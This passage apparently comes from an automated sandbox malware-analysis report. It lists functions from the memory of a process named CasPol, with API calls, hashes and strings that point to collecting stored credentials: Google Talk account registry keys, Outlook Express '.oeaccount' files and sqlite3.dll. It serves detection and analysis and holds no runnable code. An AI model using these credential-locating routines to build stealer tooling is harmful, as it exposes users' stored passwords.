                                                                                                                                                                                    • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                    • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 004108D2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                                                                                                    • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                    • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                                    • API String ID: 1640410171-3316789007
                                                                                                                                                                                    • Opcode ID: 22d987936c379f2ddbe1f4d72e7ed5a7e1d5b1ee58518d6b198fa6640511f7ba
                                                                                                                                                                                    • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 22d987936c379f2ddbe1f4d72e7ed5a7e1d5b1ee58518d6b198fa6640511f7ba
                                                                                                                                                                                    • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                                                                                                                    Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                                                                                      • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                      • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                      • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                                                                      • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                      • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                      • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                      • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 00444206
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                    • String ID: ACD
                                                                                                                                                                                    • API String ID: 1886237854-620537770
                                                                                                                                                                                    • Opcode ID: e6911fb76e44905f99aae04da62e88cbef3e0e1df9b19c178b82a06b9eab0b64
                                                                                                                                                                                    • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                                                                                                    • Opcode Fuzzy Hash: e6911fb76e44905f99aae04da62e88cbef3e0e1df9b19c178b82a06b9eab0b64
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                                                                                                    Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2054149589-0
                                                                                                                                                                                    • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                                                                                                                    • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                                                                                    • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                                                                                                                    • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                                                                                                                    Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                                                                                      • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                      • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                    • memset.MSVCRT ref: 00408620
                                                                                                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                    • memset.MSVCRT ref: 00408671
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                                                                                    • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                    • API String ID: 1366857005-1079885057
                                                                                                                                                                                    • Opcode ID: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
                                                                                                                                                                                    • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                                                                                                    • Opcode Fuzzy Hash: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                                                                                                                    Function 00410DBB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
                                                                                                                                                                                      • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                    • memset.MSVCRT ref: 00410E10
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersion_mbscpymemset
                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                    • API String ID: 3929982141-2036018995
                                                                                                                                                                                    • Opcode ID: 7ac12f80f2b375b89f7afb4171d908dc2817b99221bb223db89aef840bd4f41a
                                                                                                                                                                                    • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ac12f80f2b375b89f7afb4171d908dc2817b99221bb223db89aef840bd4f41a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                                                                                                    Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                                    • String ID: /nosort$/sort
                                                                                                                                                                                    • API String ID: 882979914-1578091866
                                                                                                                                                                                    • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                                                                                    • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                                                                                                    • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                                                                                                    Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004109F7
                                                                                                                                                                                      • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                                                                                      • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                                                                                    • memset.MSVCRT ref: 00410A32
                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3143880245-0
                                                                                                                                                                                    • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                                                                    • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                                                                                    • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                                                                    • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                                                                                                    Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1033339047-0
                                                                                                                                                                                    • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                    • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                    • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                                                                                                    Function 00402A14 Relevance: 4.5, APIs: 3, Instructions: 49registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00402A34
                                                                                                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                    • RegCloseKey.KERNEL32(?,?,?), ref: 00402A7A
                                                                                                                                                                                    • RegCloseKey.KERNEL32 ref: 00402A95
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Close$Enummemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1615280680-0
                                                                                                                                                                                    • Opcode ID: a95c34967b0cb9b80c80469a4993c45ab25de0f8a69c3d9d5225f488b7e1c4ba
                                                                                                                                                                                    • Instruction ID: 4e227b58271400dae14a407a15e496f509ceac9baab3320f2be5fe13b191b239
                                                                                                                                                                                    • Opcode Fuzzy Hash: a95c34967b0cb9b80c80469a4993c45ab25de0f8a69c3d9d5225f488b7e1c4ba
                                                                                                                                                                                    • Instruction Fuzzy Hash: D10179B590000CFFEB21EF51CD81EEA776DDF50388F100076BA84A1051E6759E959A64
                                                                                                                                                                                    Function 00406F30 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                    • free.MSVCRT ref: 00406F6D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: freemallocmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3056473165-0
                                                                                                                                                                                    • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                                                                                                                    • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                                                                                                    • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                                                                                                                    • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                                                                                                    Function 00410B1E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                    • RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                    • String ID: sqlite3.dll
                                                                                                                                                                                    • API String ID: 3677997916-1155512374
                                                                                                                                                                                    • Opcode ID: 8e969e5ca9bf6096602a78be3d4e5059fdca8f737fa6ec707583d0e92d73378d
                                                                                                                                                                                    • Instruction ID: 87b963fc64edc678a4f0440c700721264c86d0e3755c9c93a3ce53f579e10251
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e969e5ca9bf6096602a78be3d4e5059fdca8f737fa6ec707583d0e92d73378d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DE0C972A00119BBDF11AF91DD06ADA7BA9EF14298B000061FD0591221E776DEA4EAD4
                                                                                                                                                                                    Function 00406D01 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID: eBD
                                                                                                                                                                                    • API String ID: 823142352-44267735
                                                                                                                                                                                    • Opcode ID: 245fd492edc90e6f7beb3f7fe0fc2542e4d9025ddba3e970a97606beca3aa0ab
                                                                                                                                                                                    • Instruction ID: a89d01311c626acd6708100a1c920bed7e48ab8185d3fa7f8c0eae74851e3e32
                                                                                                                                                                                    • Opcode Fuzzy Hash: 245fd492edc90e6f7beb3f7fe0fc2542e4d9025ddba3e970a97606beca3aa0ab
                                                                                                                                                                                    • Instruction Fuzzy Hash: 10C012B0250300BEFF214F10EC46F37355DE740700F300424BE00F40E1C1A14D10C928
                                                                                                                                                                                    Function 0044B3CF Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                    • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                                                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                    • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                                                                                                    Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$_strcmpimemset
                                                                                                                                                                                    • String ID: /stext
                                                                                                                                                                                    • API String ID: 520177685-3817206916
                                                                                                                                                                                    • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                                                                                                    • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                                                                                                    Function 0044B40E Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                    • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                    • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                                                                                                                                                    Function 00402B22 Relevance: 3.1, APIs: 2, Instructions: 59registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00402B44
                                                                                                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                    • RegCloseKey.ADVAPI32 ref: 00402BBD
                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                      • Part of subcall function 00402A9D: memset.MSVCRT ref: 00402ABC
                                                                                                                                                                                      • Part of subcall function 00402A9D: RegCloseKey.ADVAPI32 ref: 00402B17
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Closememset$EnumOpenmemcpystrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1880195650-0
                                                                                                                                                                                    • Opcode ID: 5347bd042121d238431eb3b74689eb21bcf5dbb0349685f5868c10f604f2f03d
                                                                                                                                                                                    • Instruction ID: a6739743e39ca8df578777331d88ee5d3d666d95225ddaf8fc8e93cdb73399e2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5347bd042121d238431eb3b74689eb21bcf5dbb0349685f5868c10f604f2f03d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4811B975904109EFEB10DF95CD41ED9B77CEF20348F1004BAF988A2151EAB5AAC49B14
                                                                                                                                                                                    Function 0044B42B Relevance: 3.1, APIs: 2, Instructions: 54memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                    • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                                                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
